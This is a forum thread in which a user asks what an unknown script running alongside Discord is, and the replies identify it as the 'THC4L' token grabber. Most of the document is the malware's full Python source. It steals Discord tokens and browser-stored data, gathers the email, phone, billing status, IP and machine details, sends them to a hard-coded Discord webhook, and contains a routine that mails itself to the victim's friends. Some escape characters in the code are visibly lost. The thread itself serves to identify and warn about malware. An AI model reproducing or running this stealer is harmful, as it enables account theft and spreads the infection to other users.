Someone contacted me with a problem regarding Discord. The code below was brought to my attention as it was run around the time the problems began. Windows asks what program the code below should be run with and the default is Discord. Every time Discord is run, this chunk of code is run:
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\Discord",
"Discord Canary" : ROAMING + "\discordcanary",
"Discord PTB" : ROAMING + "\discordptb",
"Google Chrome" : LOCAL + "\Google\Chrome\User Data\Default",
"Opera" : ROAMING + "\Opera Software\Opera Stable",
"Brave" : LOCAL + "\BraveSoftware\Brave-Browser\User Data\Default",
"Yandex" : LOCAL + "\Yandex\YandexBrowser\User Data\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\Local Storage\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[w-]{24}.[w-]{6}.[w-]{27}", r"mfa.[w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x0eec59,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}nPhone: {phone}nNitro: {nitro}nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}nUsername: {pc_username}nPC Name: {pc_name}nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": f"Token grabber by THC4L"
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "THC4L",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("https://discord.com/api/webhooks/799694650549862420/rFrqEzYaTC7uS353j0HIWZaxGfxe_B6X1aTsPRY_hWOkWQIecm70fKLwMbfb8wyPz2VB", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687nContent-Disposition: form-data; name="file"; filename="{__file__}"nContent-Type: text/plainnn{content}n-----------------------------325414537030329320151394843687nContent-Disposition: form-data; name="content"nnserver crasher. python download: https://www.python.org/downloadsn-----------------------------325414537030329320151394843687nContent-Disposition: form-data; name="tts"nnfalsen-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
Any idea what this could be? I can see: for token in gettokens(path): and "text": f"Token grabber by THC4L" It almost looks like a Discord token skimmer. It looks like it takes phone numbers, usernames, account info, PC info and more…
EDIT:
THIS IS MALWARE. This is a token logger for the Discord desktop app. It also looks in your browser for other discord-related information.
It has been reviewed in greater depth here:
https://www.youtube.com/watch?v=s3wS1Dd3FFs&feature=youtu.be
The scriptwriter gives some very insightful information in the Pastebin link he provided and I would encourage you to check it out:
https://pastebin.com/0q0Fk0Ej
It specificaly tries to pull:
- Public ip address
- Discord tokens
- Discord friends
- Discord friend’s ids
- Dicord username
- Discord user id
- Discord email
- Discord nitro (checks if you have it)
- Phone number
- Billing onfo
- PC username
- PC name
- PC platform
Since removed YouTube account promoting the script:
https://www.youtube.com/channel/UCydMtuzGQ0kFPhK2hIXFf6A
The creator’s Github account:
Advertisement
Answer
That is malware, not only a token logger but also stealing Chrome, Brave, Opera and Yandex passwords. Uninstall that immediately and change all your passwords.
YouTube channel of creator: https://www.youtube.com/channel/UCydMtuzGQ0kFPhK2hIXFf6A
update: As it turns out, it also steals your ip, yay!